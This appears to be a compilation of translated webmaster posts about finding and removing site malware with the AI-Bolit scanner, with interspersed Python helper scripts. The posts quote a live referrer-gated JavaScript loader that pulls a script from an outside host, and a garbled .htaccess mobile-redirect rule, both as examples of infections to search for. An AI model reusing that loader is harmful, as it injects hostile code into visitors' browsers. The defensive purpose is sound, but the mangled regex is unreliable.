AI-Bolit: a PHP web shell and virus scanner for hosting. How to use the AI-Bolit scanner


AI-Bolit: an efficient scanner for viruses and other malicious code on hosting

We are often asked why the AI-Bolit scanner is unique, and what is wrong with similar tools for finding malicious code such as maldet, clamav or desktop antiviruses. The short answer: AI-Bolit is better at detecting malicious code written in PHP and Perl. Why? See below.

Every day malicious code (hacker web shells, backdoors and so on) becomes more sophisticated and more complex. Besides obfuscation of identifiers and encryption of the code, implicit function calls are now used everywhere: methods with callable arguments, handlers and indirect function calls.

Fewer and fewer malicious scripts have a linear structure and fixed identifiers. The code is masked and made as variable and "polymorphic" as possible, or, on the contrary, made as simple as possible and similar to the original script.

Sometimes, when analysing a malicious script, it is impossible to pick out a fixed fragment that would unambiguously identify it as malicious. Obviously such code cannot be detected with a simple signature database (an antivirus database), which is what most web antiviruses and hosting scanners rely on. Effective detection of modern malware requires more flexible ways of describing malicious patterns and, in some cases, heuristics. This is exactly the approach we use in the AI-BOLIT malware scanner.
A large, constantly updated database of malicious patterns based on regular expressions, together with a heuristic analyser built on the experience of scanning a large number of infected sites, has made the AI-Bolit scanner one of the most effective and most widely used webmaster tools.

AI-Bolit also owes its wide popularity to its simple interface and to being free for non-commercial use. Any webmaster can download AI-Bolit free of charge from the official site http://revisium.com/ai/ and check their resource for hacker shells, backdoors, doorways, viruses, spam mailers, hidden links and other malicious fragments and injections. The scanner is also actively used by commercial companies: web studios, hosting companies and Internet agencies use it to check and clean client sites. Hosters integrate AI-Bolit into their control panels, and web studios use it to search for malicious code and as part of site-monitoring services.

Below is only a short list of the AI-Bolit scanner's features:

  • launch from the browser or from the console
  • three scanning modes ("simple", "expert", "paranoid") and two operating modes ("express" and "external scan")
  • search for hacker PHP and Perl scripts (shells, backdoors), virus injections, doorways, spam mailers, link-selling scripts, cloaking scripts and other kinds of malicious scripts, both by patterns and regular expressions and by heuristics for potentially malicious code
  • search for signatures in encrypted and fragmented text blocks and in hex/oct/dec encodings
  • search for suspicious files containing constructs typical of malicious scripts
  • search for injections in files
  • search for symbolic links
  • search for search-engine and mobile redirect code, and much more.
By the way, a RosPatent author's certificate has been obtained for AI-Bolit, and the scanner is regularly mentioned on third-party sites, in specialised magazines, at conferences and in webinars.

Official site of the script

Everyone who builds sites sooner or later runs into viruses and trojans on a site. The main thing is to notice the problem in time, before the project is penalised by search engines or blocked by the hoster (for DDoS, spam).

This article was written in the heat of the moment, after ESET Smart Security on a Windows machine suddenly started complaining about images during a large backup of a site, treating them as viruses. It turned out that a FilesMan backdoor had been uploaded to the site disguised as images.

The hole was that the upload script allowed images to be uploaded to the site and checked only the file extension; the content was not checked at all. Don't do that ;) As a result, any PHP file could be uploaded to the site under the guise of an image. But this is not about holes...

This is about how to check all the files on a site for viruses and trojans.

Checking the site for viruses online

Online checks of a site for viruses are completely unsuitable for this task. Online scanners behave like a search-engine robot, walking sequentially through all the publicly reachable pages of the site. They reach a page only by following links from other pages. So if an attacker uploaded a backdoor to your site disguised as an image, that image is not linked from any page, and the site was not defaced, that is, no virus was planted in the pages themselves, an online check simply never sees the image and never finds the virus.

Why, you ask, would an attacker do that? Upload a backdoor and do nothing? The answer: for spam, for DDoS. For any activity that does not show up on the site's pages.

In short, an online virus check of a site is completely useless for peace of mind.

Plugin for checking WordPress site for viruses and trojans

There is an antivirus plugin for WordPress. It did well at finding the FilesMan images when cleaning the site of viruses. But it has a serious shortcoming. During a check it creates a heavy load on the server, because it simply goes through all the files. Moreover, out of the box the check can only be run by hand; there is no way to automate checking the site with the plugin.

And this only works for WordPress, while something universal is needed.

Checking the website with the best antivirus

As said above, the problem was in fact discovered by accident by an ordinary desktop antivirus during a backup. Obviously, you could download the whole site and check it with a good antivirus. That is quite practical. But:

  • first, I want automation, so that the check runs automatically and a report is ready in the morning;
  • second, downloading every site every day is simply unrealistic.

Try AI-Bolit

I got carried away with the intro. As a result of all my searching I found a wonderful FREE antivirus for the site. This antivirus can be used according to several schemes. I used it via SSH.

Whether it can be used on shared hosting I did not investigate, but I think it can. AI-Bolit is written in PHP and can be launched from a browser, so purely technically it is certainly possible on shared hosting.

Important! Aibolit does not cure the site of viruses; it only tells you which files are suspicious, and you deal with them yourself. So just clicking a button will not rid the site of trojans.

How to run AI-Bolit on a VDS via SSH

Aibolit has instructions and master classes on how to use this antivirus. The sequence in the general case is simple:

  • download it
  • unpack it on the server (I unpacked it into /root/ai)
  • from the SSH console run php /root/ai/ai-bolit/ai-bolit.php
  • the check can take a long time, depending on the site
  • as a result of the check a report file named AI-BOLIT-REPORT-<date>-<time>.html is generated

Problem files, if any are found, will be listed in the report file.

Heavy load on the server

The main problem with automatic virus checks of a site is the load on the server. All antiviruses work the same way: they go sequentially through all the available files. Aibolit is no exception; it simply takes all the files and checks them one by one. This is slow and can take a long time, which is unpleasant on a production server.

But Aibolit has a useful feature (provided you have a full server or a VDS with root access). You can produce the list of files to check for Aibolit yourself, and then Aibolit will go through just that list.

The list can be formed by any means available on the server. I have the following bash script:

# bash /root/ai/run.sh
# https://revisium.com/kb/ai-bolit-console-faq.html
DOMAIN="website"
AI_PATH="/root/ai"
NOW=$(date +"%F-%k-%M-%S")
# you can create a public folder under password access
REPORT_PATH="$AI_PATH/reports/$DOMAIN-$NOW.html"
SCAN_PATH="/home/azzrael/web/$DOMAIN/public_html/"
SCAN_DAYS=90
#php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --report=$REPORT_PATH
# Scan only the files changed in the last SCAN_DAYS days.
# The list file name AI-BOLIT-DOUBLECHECK.php is hardcoded by aibolit's author for --with-2check !!!
find "$SCAN_PATH" -type f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
#find "$SCAN_PATH" -type f -name "*.ph*" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
#find "$SCAN_PATH" -type f \( -name "*.ph*" -o -name "*.gif" \) -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php"
php "$AI_PATH/ai-bolit/ai-bolit.php" --mode=1 --report="$REPORT_PATH" --with-2check
#history -c

Here you can see that with the find command we select all files created or changed in the last SCAN_DAYS days and write them to the list AI-BOLIT-DOUBLECHECK.php. SCAN_DAYS can be as small as one day. If you put bash /root/ai/run.sh into cron, the list of files to check will be small, so the check will not take long and will not load the server much.
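The same "only recently changed files" idea, written as an added Python example rather than the article's own bash script, so that the selection can skip image extensions and symlinks and can be unit-tested. The install layout (AI_PATH, the AI-BOLIT-DOUBLECHECK.php list file, the --with-2check switch) is taken from the article; the default scan path and the skip list are assumptions.

```python
"""Added example (not from the article): build the AI-BOLIT-DOUBLECHECK.php list
from files whose change time (ctime, as in the article's `find -ctime -N`) falls
within the last N days, then hand it to the scanner with --with-2check."""
import os
import subprocess
import sys
import time

# Assumed layout, mirroring the article's run.sh; adjust to your install.
AI_PATH = "/root/ai"
AI_BOLIT = os.path.join(AI_PATH, "ai-bolit", "ai-bolit.php")
DOUBLECHECK_FILE = os.path.join(AI_PATH, "ai-bolit", "AI-BOLIT-DOUBLECHECK.php")
# Constructed skip list: pure media rarely carries PHP, so leave it to a full scan.
SKIP_EXT = {".jpg", ".jpeg", ".png", ".gif", ".mp4"}


def recent_files(scan_path, days, skip_ext=frozenset(), now=None):
    """Return sorted paths of regular files under scan_path whose ctime is newer
    than `days` days ago (roughly what `find -type f -ctime -N` selects on Unix).
    Symlinks are skipped: the link target lives in its own tree."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    found = []
    for root, _dirs, files in os.walk(scan_path):
        for name in files:
            path = os.path.join(root, name)
            if os.path.splitext(name)[1].lower() in skip_ext:
                continue
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                st = os.stat(path)
            except OSError:
                continue  # file vanished while walking
            if st.st_ctime >= cutoff:
                found.append(path)
    return sorted(found)


def write_doublecheck_list(paths, list_file=DOUBLECHECK_FILE):
    """Write one absolute path per line, which is what --with-2check reads;
    returns the number of files queued."""
    os.makedirs(os.path.dirname(list_file), exist_ok=True)
    with open(list_file, "w", encoding="utf-8") as fh:
        for p in paths:
            fh.write(p + "\n")
    return len(paths)


if __name__ == "__main__":
    # usage: python doublecheck.py /home/azzrael/web/website/public_html/ 90
    scan = sys.argv[1] if len(sys.argv) > 1 else "/home/azzrael/web/website/public_html/"
    days = int(sys.argv[2]) if len(sys.argv) > 2 else 90
    queued = write_doublecheck_list(recent_files(scan, days, SKIP_EXT))
    print(f"{queued} files queued in {DOUBLECHECK_FILE}")
    if queued:  # nothing changed: skip the scan instead of scanning an empty list
        subprocess.run(["php", AI_BOLIT, "--mode=1", "--with-2check"], check=False)
```

Run it from cron with the same cadence as SCAN_DAYS; if no file changed in the window, the scanner is not started at all, which is the cheapest possible check.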

Are you sure your sites are not infected with viruses? Did you check the site with an online antivirus? Forget it: online antiviruses will never find the viruses that skilled hackers have planted in your site.

The most they can do is spot malicious scripts that you yourself installed on the site by mistake. So more radical methods of checking the site for viruses are needed, ones that do not just skim the surface but look inside the project.

How to check a site for viruses, paid and free?

This article describes several ways to check your site for viruses:

Online antiviruses: the simplest, but in most cases the least effective way.

The Aibolit antivirus: a better and more convenient way.

The Virusday site antivirus: the best option.

And a little about why a virus on the site is dangerous.

Why is a virus on the site dangerous?

But first a bit of theory from personal experience: I have been hacked more than once. What does infecting a site with a virus mean? Having gained access to your site, attackers can do the following:

Redirect your traffic to their own projects.
Download the server contents and the database for sale to third parties.
Change contact and payment details on the site, harvest visitors' personal data.
Place doorways with spam links on your site.
Spread viruses, trojans and exploits through the site's pages, infecting visitors.
Send spam from your server.
Sell access to the hacked site to other attackers for further abuse.

It is important to understand: sites with viruses can fall under search-engine sanctions and lose positions. My hosting has been hit by hackers more than once, so I know what I am talking about. Why do they bother? The goal is banal: to get hold of your passwords or to inject a virus into your site through a hole in the code.

I think I have already had two sites defaced by them. But that is only half the trouble, because my sites were infected afterwards, and even changing passwords did not help much. And there is no guarantee it will not happen again.

Then, if I remember rightly, access to the site and to the admin panel was lost. What the trouble was, I do not know. On my current hosting there has been nothing like it. And so far I have not come under DDoS attacks either...

The easiest way to cure a site is to wipe everything and install the engine again. But, as you understand, that is an extreme measure to be used only as a last resort. The same code can be sewn into the template, and you will not notice. So you need to find out how badly our site is infected. How to do that?

Where to check a site for viruses online?

Checking a site for viruses online: although this method is not the most effective, as I wrote above, you can start with it. There is a decent service, Antivirus Alarm.

Just enter the site address and wait until the service checks your site for viruses. If it finds what you suspected, you will see it in the results. If the online antivirus finds nothing, try a better solution.

How to check a site for viruses with a script?

Literally the other day I checked all my sites with the Aibolit antivirus and found that my main site was infected.

What is this antivirus and how to use it?

You can download this antivirus from the developer's site, Aibolit. At the moment there is also a version for Windows; earlier it could only be run on the hosting.

What can this site antivirus do? Here is what:

- search for viruses, malicious and hacker scripts on the hosting: shells by signatures and malicious patterns, shells by heuristics, all the things that ordinary antiviruses and scanners cannot find.
- search for vulnerable scripts: timthumb, fckeditor, uploadify, etc.
- search for redirects to malicious sites in .htaccess.
- search for link-exchange code such as sape/trustlink/linkfeed/... in .php files.
- find doorway directories and files.
- find hidden links (invisible links) in templates.
- find directories open for writing.
- work with popular CMSs without false positives (joomla, wordpress, drupal, dle, bitrix, phpbb, ...).
- send the report by email or save it to a file.

Installation is simple: unpack the archive and upload the files ai-bolit.php, .aignore and .aurlignore from the ai-bolit folder to the folder with our site, together with the file from the known_files folder that matches the version of our CMS, in my case .aknown.wp_3_8 for WordPress. You may also need to set the correct permissions on the files, 755 for example.

Now, if you have proper hosting, you need to open a terminal (I have Linux, so no emulators are needed) and connect to our hosting via SSH.

ssh LOGIN@SERVER_ADDRESS

I will not explain this in detail; if you are not on Linux, an individual approach is needed, write in the comments and I will explain.

After connecting, use the cd command to go to the folder with the site. Then give the command:

php ai-bolit.php

After that the scan starts; it can take quite a while, depending on the site. When it finishes, the site folder will contain a file with a unique name, AI-BOLIT-REPORT-07-04-2014_23-10-719945.html

Open the file and analyse what is in it. For example, at the very top I saw:

Shell script signature found. Suspicion of a malicious script: (12)

But in fact only one of these was a virus; the rest were warnings about a certificate that looks like encrypted content.

The easiest thing to do here is to take a clean WordPress, or whatever engine you have, and compare the files. If they are identical to the originals, there is nothing to worry about. If not, you can see the malicious code. Next it complained about:
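The "compare with a clean copy" step, as an added Python example (not from the article): it hashes both trees and reports files that differ from the reference, files that exist only on the site (the usual place for an uploaded shell or an injected plugin file) and files the site is missing. The directory paths are placeholders; the extension filter keeps the comparison to the file types AI-Bolit also concentrates on, and includes .htaccess so redirect injections are not missed.

```python
"""Added example (not part of the article): compare a site tree against a clean
copy of the same CMS version, the way the article suggests verifying AI-Bolit
warnings by hand. Paths given on the command line are placeholders."""
import hashlib
import os
import sys


def _ext(name):
    """Extension in lower case; dotfiles such as .htaccess count as their own
    extension because os.path.splitext treats the leading dot as the name."""
    return os.path.splitext(name)[1].lower() or name.lower()


def file_hashes(root, exts=None):
    """Map relative path -> sha256 hex for regular files under root.
    If exts is given, only files with those extensions are hashed."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if exts and _ext(name) not in exts:
                continue
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            out[os.path.relpath(full, root)] = h.hexdigest()
    return out


def compare_trees(site_root, clean_root, exts=(".php", ".js", ".htaccess")):
    """Return a dict with sorted relative paths:
    'modified' (in both trees, different content),
    'added'    (only on the site: the first place to look during a cleanup),
    'missing'  (only in the clean copy)."""
    site = file_hashes(site_root, set(exts))
    clean = file_hashes(clean_root, set(exts))
    return {
        "modified": sorted(p for p in site if p in clean and site[p] != clean[p]),
        "added": sorted(p for p in site if p not in clean),
        "missing": sorted(p for p in clean if p not in site),
    }


if __name__ == "__main__":
    # usage: python compare.py /var/www/site/public_html /tmp/wordpress-clean
    result = compare_trees(sys.argv[1], sys.argv[2])
    for kind in ("modified", "added", "missing"):
        for rel in result[kind]:
            print(f"{kind:9s} {rel}")
```

"added" under wp-content/plugins or wp-content/uploads deserves the closest look, since those are the directories where both the article's TOP 10 plugin problem and the FilesMan images lived.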

Double extension, encrypted content or suspicion of a malicious script. Additional analysis required: (14)

The antivirus complained about one plugin, TOP 10; no surprise, that is where the problem was. The other warnings were false positives.

The heuristic analysis also complained about WordPress files, but I compared them with the originals and everything was fine.

These files contain hidden links. Suspicion of link spam:

Here it was a plugin that creates the UP button; a link had been added to it.

If you have such plugins, keep in mind that anything could be in them. But this is solved simply: close the plugin folder from indexing. In WordPress you do that by adding a line to robots.txt: Disallow: /wp-content/plugins

Each case will be individual, so it is hard to write more specifically. The purpose of the article is rather to give a direction.

All this is good, but one thing is missing: constant monitoring. You will not be launching the antivirus every day, and hackers work without holidays. Here another wonderful service helps us. How to check the site with a service?

Automatic checking of the site for viruses

The Virusday service appeared recently; it can constantly monitor the site for viruses. Everything is clear and functional, and the site virus check is the best here:

You need to add your site there and download the synchronisation PHP file, which is uploaded to the root of the site. Then you can start synchronisation and the service will check your site for viruses.

The free version is limited in its capabilities, so if your site is dear to you, you can pay a little and sleep peacefully: the service itself will remove the virus and alert you immediately.

And here, a virus was found on one site. This site had been hacked on my server, until I cut off the publishing protocol. The problem had been found, but the virus remained:

Well, let's try to remove the infection. No, not here: the service does not remove the virus without payment, it only shows this information:

Threats found: h.ExternalRedirect
The web server configuration file contains instructions that, intentionally or not, redirect the site to a third-party resource. Removal is recommended.

How to remove the virus it found on the site? I will try to find it manually, or maybe subscribe to a paid plan; the site's security is worth it. Most likely I brought this infection over from shared hosting; now I have a VPS and there have been no particular problems. So register on Virusdai and connect your site.

If you know other ways to check a site for viruses, better than these, everyone would be glad to hear about them.

Yesterday something very unpleasant happened to me: all my sites were infected. Fortunately, I was at the computer and noticed the problem at once. What happened?

One of my sites suddenly started redirecting to a dating site, an obscene one, to put it mildly. When you went to my domain, it redirected you to that spammy site.

The situation is even worse if you do not solve the problem right away, because visitors notice. And if it goes on for a long time, search engines can apply a filter to your site and it will lose all its positions in search.

I already wrote about how to check a site, but in this particular case the virus had to be found quickly. I simply went looking for the malicious code manually.

Since the redirect happened from every page, I thought some script had been put into the header (header.php) or the footer (footer.php). But there was no third-party code there.

I immediately wrote to the hosting support:

- I have such-and-such site, it has started redirecting to an obscene resource, please help solve the problem.

But they did not get ahead of me, as I myself guessed where else to look. In the .htaccess file in the root of the site I found the following code:

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} mobile|midp|mmp|netfront|palm(os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0| wadofone|wap|windows (ce|phone)|xda|xiino
RewriteCond %{HTTP_USER_AGENT} )|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu| ar(ch|go)| |-m | r | s) | van | be (ck | )|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)| |d(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)| |fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)| t)|hei-|hi(pt|ta)|hp(i|ip)|hs-c| aw|tc)|i-(20|go|ma)|i230|iac(|-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro |jemu|jigs|kddi|keji|kgt (|/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg(g|/(k|l|u)| m1 -w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef | mo(01|02|bi|de|do|t(-| mt(50|p1|v)|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7 (0(0|1) | 10) | ne ((c | m) - | on | tf | wf | wg | wt) | a|d|t)|pdxg|pg(13|-(|c)) |phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt- g|qa-a|qc(07|12|21|32|60|- |i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma| mm | ms | ny | va) | sc (01 | h- | oo | p -) | sdk / | se (c (- | 0 | 1) | 47 | sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)| so(ft|ny)|sp(01|h-|v-|v) |sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)| tcl-|tdg-|t(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|(40|5|-v)|vm40|voda |vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-|)|webc|whit|wi( g | nc | nw) | wmlb | wonu | x700 | yas- | your | zeto | zte-)

As soon as I removed it, everything started working as it should. In all it took me 5 minutes. But if a beginner were in my place, it could have taken a couple of hours, if they could find the problem at all.
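The rule above has the typical shape of an injected redirect: one or more RewriteCond lines testing the User-Agent or Referer, followed by a RewriteRule whose target is an absolute URL on a foreign host. This added Python example (not from the article, and not AI-Bolit's own code) parses an .htaccess and reports exactly that pattern, which is also what Virusday's h.ExternalRedirect finding describes. The sample .htaccess is constructed for the demonstration; the list of hosts that may legitimately be redirect targets (own_hosts) is an assumption you supply per site.

```python
"""Added example (not from the article): flag .htaccess RewriteRules that send
visitors to an external host, and show which RewriteCond variables gate them.
Cloaked rules (conditioned on User-Agent or Referer) are the suspicious ones."""
import re
from urllib.parse import urlparse

COND_RE = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_USER_AGENT|HTTP_REFERER)\}", re.I)
ANY_COND_RE = re.compile(r"^\s*RewriteCond\b", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def find_external_redirects(text, own_hosts=()):
    """Return a list of findings, one per RewriteRule whose target is an absolute
    URL on a host outside own_hosts. Each finding records the line number, the
    target, the sorted set of RewriteCond variables that precede the rule
    ('OTHER' for conditions on anything but UA/Referer) and whether the rule
    carries an R (external redirect) flag."""
    own = {h.lower() for h in own_hosts}
    findings, pending = [], []   # pending: conditions since the last RewriteRule
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = COND_RE.match(line)
        if m:
            pending.append(m.group(1).upper())
            continue
        if ANY_COND_RE.match(line):
            pending.append("OTHER")
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), (m.group(3) or "")
        host = urlparse(target).hostname if "://" in target else None
        # A target built from %{HTTP_HOST} points back at the same site.
        if host and "%{" not in target and host.lower() not in own:
            findings.append({
                "line": lineno,
                "target": target,
                "conditions": sorted(set(pending)),
                "redirect": any(f.strip().upper().startswith("R") for f in flags.split(",")),
            })
        pending = []
    return findings


def is_cloaked(finding):
    """True when the external redirect only fires for some UA/Referer, i.e. the
    owner browsing normally would never see it."""
    return bool({"HTTP_USER_AGENT", "HTTP_REFERER"} & set(finding["conditions"]))


# Constructed sample: a legitimate www canonicalisation followed by an injected,
# search-engine-and-mobile-only redirect of the kind described in the article.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteBase /
# legitimate www canonicalisation
RewriteCond %{HTTP_HOST} ^example\\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [L,R=301]
# injected: send mobile visitors arriving from search engines elsewhere
RewriteCond %{HTTP_REFERER} (google|yandex|bing) [NC]
RewriteCond %{HTTP_USER_AGENT} (android|iphone|mobile) [NC]
RewriteRule ^.*$ http://dating-spam.example/go.php?d=1 [R=302,L]
RewriteRule ^index\\.php$ - [L]
"""

if __name__ == "__main__":
    for f in find_external_redirects(SAMPLE_HTACCESS, own_hosts=("www.example.com",)):
        tag = "CLOAKED" if is_cloaked(f) else "external"
        print(f"line {f['line']}: {tag} redirect to {f['target']} (conds: {f['conditions']})")
```

Run it over every .htaccess in the account (there may be more than the one in the web root; AI-Bolit's own feature list includes this search), and treat a cloaked finding as the thing to remove first, because you will never reproduce it from your own desktop browser.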

Afterwards I found that all my sites had been infected in the same way. I solved the problem and wrote to the hosting support:

All my sites were infected, and probably everything on your hosting was infected too; it would be good to warn people.

What did they answer:

"Infected" were only the files of your sites. Since some of your sites had vulnerabilities, they were used to change the files in your account. You need to contact a web developer to find and fix these vulnerabilities.

Maybe so. But this is not the first time my sites have been infected on this hosting. Do all webmasters have the same problems? Or is it something with my hosting?

This is not my first hosting, and I never had such problems anywhere else. I am increasingly inclined to change hosting, for example to this one.

I did not understand the problem when tech support wrote to me that another of my sites was sending spam. As it turned out, a third-party PHP file had been uploaded into the folder of one plugin, and spam was being sent through it.

I deleted that file and the problem was solved. I already get the impression that WordPress is like Windows, and what can you do about it?

The AI-BOLIT scanner offers the most functionality when run in command-line mode. It can be run under Windows/Unix/Mac OS X, and directly on the hosting if you have SSH access and the hoster does not strongly limit processor resources, which is the better option.

Note that running the scanner requires the console version of PHP 7.1 or higher. Earlier versions are not officially supported. Check the current version with the php -v command.

Description of the AI-BOLIT scanner's command-line parameters

Show help

php ai-bolit.php --help

Skip files with the listed extensions

php ai-bolit.php --skip=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

Scan only files with the listed extensions

php ai-bolit.php --scan=php,php5,pht,phtml,pl,cgi,htaccess,suspected,tpl

Prepare a quarantine file to send to a security specialist. An archive AI-QUARANTINE-XXXX.zip protected with a password will be created.

php ai-bolit.php --quarantine

Run the scanner in "paranoid" mode (recommended for getting the most detailed report)

php ai-bolit.php --mode=2

Run the scanner in "expert" mode

php ai-bolit.php --mode=1

Check a single file, "pms.db", for malicious code

php ai-bolit.php -jpms.db

Run the scanner with a 512Mb memory limit

php ai-bolit.php --memory=512M

Set the maximum size of files to check to 900Kb

php ai-bolit.php --size=900K

Pause 500ms between files during the scan (to reduce the load)

php ai-bolit.php --delay=500

Send the scan report to the email address [email protected]

php ai-bolit.php [email protected]

Create the report in the file /home/scanned/report_site1.html

php ai-bolit.php --report=/home/scanned/report_site1.html

Scan the directory /home/s/site1/public_html/ (by default the report will be created inside it, unless the option --report=report_file is set)

php ai-bolit.php --path=/home/s/site1/public_html/

Run a command after the scan finishes.

php ai-bolit.php --cmd="~/postprocess.sh"

Save the report in plain-text form to the file site1.txt

php ai-bolit.php -lsite1.txt

Options can be combined, for example:

php ai-bolit.php --size=300K --path=/home/s/site1/public_html/ --mode=2 --scan=php,phtml,pht,php5,pl,cgi,suspected

By combining the AI-BOLIT scanner with other unix commands you can, for example, scan sites in batch. Below is an example of checking several sites hosted within one account. If the sites live under the /var/www/user1/data/www directory, the command to launch the scanner will be

find /var/www/user1/data/www -maxdepth 1 -type d -exec php ai-bolit.php --path={} --mode=2 \;

By adding the --report parameter you can specify the directory where the scan report will be placed.

php ai-bolit.php <parameter list> ... --eng

Switch the interface to English. This parameter can go at the end.

Integration with other services and into the hosting panel

php ai-bolit.php --json_report=/path/file.json

Produce the report in json format

php ai-bolit.php --progress=/path/progress.json

Save the scan status to a json file. The file contains structured data in json format: the file currently being checked, the number of files checked, the number of files left to check, scan timestamps and the time remaining until the end of the scan. This mechanism can be used to show a progress bar and information about the files being checked in a hosting panel. When the scan finishes, the file is removed automatically.

php ai-bolit.php --handler=/path/handler.php

External event handler. You can attach your own actions to the start of the scan, its completion, its progress and its errors. An example file is included in the scanner archive at tools/handler.php. For example, after the scan finishes you can do something with the report file (send it by mail, pack it into an archive, and so on).

Today I was asked for help cleaning an online store of viruses. One of its ads had been rejected by Google Adwords. The notice said that the file jquery.js contained suspicious code.

First I opened the path to the file in the browser; the Avast antivirus did not react to the file, although visually I could already see the malicious code. Then I connected by FTP with FileZilla and tried to open the file in Notepad++. And here my antivirus blocked access to the file.

To clean the js file of the virus I had to turn AVAST off for 10 minutes and then delete the lines from the file.

If you run into a similar problem, look for the following code, shown in the picture, or these lines:

var r=document.referrer; var c=document.cookie; r1=0;
if ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf("mail")>0)) { document.cookie = "__ga1=1; expires=Wed, 1 Mar 2020 00:00:00; path=/;"; r1=1; }
else { if (c.indexOf("__ga1")==-1) { document.cookie = "__ga2=1; expires=Wed, Mar 1 2020 00:00:00; path=/;"; } }
if (((c.indexOf("__ga1")>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) { document.write(unescape("%3Cscript src=\"http://google-analyzing.com/urchin.js\" type=\"text/javascript\"%3E%3C/script%3E")); }
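What makes this loader hard to spot by eye is the percent-encoded script tag inside unescape(): a plain search for "<script src=" does not hit it, and the referrer check means the owner, who types the URL directly, never triggers it. The added Python example below (not from the article, and not AI-Bolit's own signatures) decodes unescape() arguments first and then looks for the three traits together: an external script tag, a document.write, and gating on document.referrer against search-engine names. The JavaScript samples are constructed for the test and use a reserved .invalid host in place of the real one.

```python
"""Added example (not from the article): a small signature check, in the spirit
of AI-Bolit's pattern matching, for referrer-gated script loaders hidden in
otherwise legitimate .js files."""
import re
from urllib.parse import unquote

# unescape("...") with either quote style; backslash-escaped quotes inside are kept.
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])((?:\\.|(?!\1).)*)\1\s*\)", re.S)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)
# document.referrer tested against a search-engine name within a short distance.
REFERRER_GATE_RE = re.compile(
    r"document\.referrer[\s\S]{0,200}?indexOf\(\s*['\"](google|yandex|bing|rambler|mail)['\"]",
    re.I)


def normalise(js):
    """Replace every unescape("...") call with the decoded string literal, so the
    rest of the checks see the real HTML that would be written into the page."""
    def decode(m):
        return '"' + unquote(m.group(2)).replace('\\"', '"') + '"'
    return UNESCAPE_RE.sub(decode, js)


def inspect_js(js):
    """Return the individual traits; keeping them separate lets an analyst see
    why a file was flagged instead of getting a bare verdict."""
    text = normalise(js)
    return {
        "external_script_tags": sorted(set(SCRIPT_SRC_RE.findall(text))),
        "referrer_gated": bool(REFERRER_GATE_RE.search(text)),
        "document_write": "document.write(" in text,
    }


def is_suspicious(js):
    """An external script tag written via document.write, or one that only
    appears for search-engine referrers, is the loader pattern from the article."""
    t = inspect_js(js)
    return bool(t["external_script_tags"]) and (t["document_write"] or t["referrer_gated"])


# Constructed samples (the host is a placeholder, not the one from the article).
SAMPLE_INJECTED = (
    'var r=document.referrer;var c=document.cookie;r1=0;'
    'if((r.indexOf("yandex")>0)||(r.indexOf("google")>0)){'
    'document.cookie="__ga1=1; path=/;";r1=1;}'
    'if(((c.indexOf("__ga1")>-1)||(r1==1))&&(c.indexOf("__ga2")==-1)){'
    'document.write(unescape("%3Cscript src=\\"http://loader.invalid/urchin.js\\" '
    'type=\\"text/javascript\\"%3E%3C/script%3E"));}'
)
SAMPLE_BENIGN = '(function($){$.fn.tip=function(){return this;};})(jQuery);'

if __name__ == "__main__":
    for label, js in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        print(label, is_suspicious(js), inspect_js(js))
```

Point it at the .js files AI-Bolit lists under "suspicious" to confirm a verdict; the decoded literal from normalise() is also the quickest way to read what a flagged file would actually inject.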

Site backup.

You were given SSH access, for example through the putty utility; if possible, make an archive of the site. To do that it is enough to run the following command in the console:

tar -cf backup.tar /home/login/site/public_html

* /home/login/site/public_html is the path to the site's main directory

You can skip backing up the site, but you know yourself how important it is.

Now there are two options for checking the site for viruses

1. Check the site with the Ai-Bolit PHP script, which detects various viruses and PHP shells.

2. Download the whole site to your computer and run the Avast antivirus over it; but the first option is considerably faster, better and more accurate.

Cleaning the site on the local computer

